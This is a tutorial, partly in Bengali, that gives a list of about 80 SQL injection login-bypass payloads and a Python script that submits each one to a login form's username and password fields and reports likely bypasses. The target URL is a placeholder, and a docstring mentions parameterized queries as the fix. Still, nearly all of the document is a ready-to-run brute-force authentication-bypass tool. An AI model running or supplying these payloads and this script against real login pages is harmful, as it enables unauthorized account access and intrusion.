আমার একটি SQL payload লিস্ট আছে। আমি একটি একটি করে চেক করে দেখতে পারি কোন কোড দ্বারা লগইন পেজ break করে ঢুকা যাচ্ছে কিনা, কিন্তু একটি একটি করে করা অনেক সময়সাপেক্ষ, তাই এই কাজ আমরা পাইথন দিয়ে করবো।
Install the requests library if you haven’t already:
pip install requests
Directory Setup
- Payload file: Create a text file (payloads.txt) with each payload on a new line.
- Python script: Create a Python script (url_sql_injection_tester.py).
Payloads Text File (payloads.txt)
Place your SQL injection payloads in this file:
admin' -- //
' or 1 -- //
suresh' -- //
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
import requests
# Login endpoint that receives the form POSTs (example.com is a placeholder).
url = "http://example.com/login"

# Sent with every request: the body is an HTML-form-encoded key/value set.
headers = {"Content-Type": "application/x-www-form-urlencoded"}
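# Function to test payloads
def test_payloads(payload_file):
    """Submit every payload in *payload_file* to the login form at ``url``.

    Each non-empty line is POSTed twice: once as ``username`` (with the
    fixed password ``'password'``) and once as ``password`` (with the fixed
    username ``'admin'``). A line is printed for every response that has
    status 200 and does not contain the word "error" (case-insensitive).

    That check is only a heuristic, so a printed hit is a candidate for
    manual verification, not proof of an authentication bypass:
    ``requests`` follows redirects by default, so the status seen here is
    that of the final page, and a failed login that answers 200 with
    wording other than "error" (e.g. "invalid credentials") is reported
    too. A confirmed hit means the login query is built by concatenating
    user input into SQL; the server-side fix is parameterized queries.

    Args:
        payload_file: Path to a text file with one payload per line.

    Raises:
        OSError: If *payload_file* cannot be opened.
        requests.RequestException: If a request fails or times out.
    """
    # Without a timeout, requests waits indefinitely on a stalled server.
    timeout_seconds = 10

    with open(payload_file, 'r') as file:
        payloads = [line.strip() for line in file]

    for payload in payloads:
        if not payload:
            # Blank lines (e.g. a trailing newline) are not payloads.
            continue

        # Test the payload in the username field
        data = {
            'username': payload,
            'password': 'password'
        }
        response = requests.post(
            url, headers=headers, data=data, timeout=timeout_seconds
        )
        if _no_error_in_ok_response(response):
            print(f"[+] Successful payload in username field: {payload}")

        # Test the payload in the password field
        data = {
            'username': 'admin',
            'password': payload
        }
        response = requests.post(
            url, headers=headers, data=data, timeout=timeout_seconds
        )
        if _no_error_in_ok_response(response):
            print(f"[+] Successful payload in password field: {payload}")


def _no_error_in_ok_response(response):
    """Return True for a 200 response whose body lacks the word "error"."""
    return 'error' not in response.text.lower() and response.status_code == 200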
if __name__ == "__main__":
    # The payload list is looked up relative to the current working directory.
    payload_file = 'payloads.txt'
    test_payloads(payload_file=payload_file)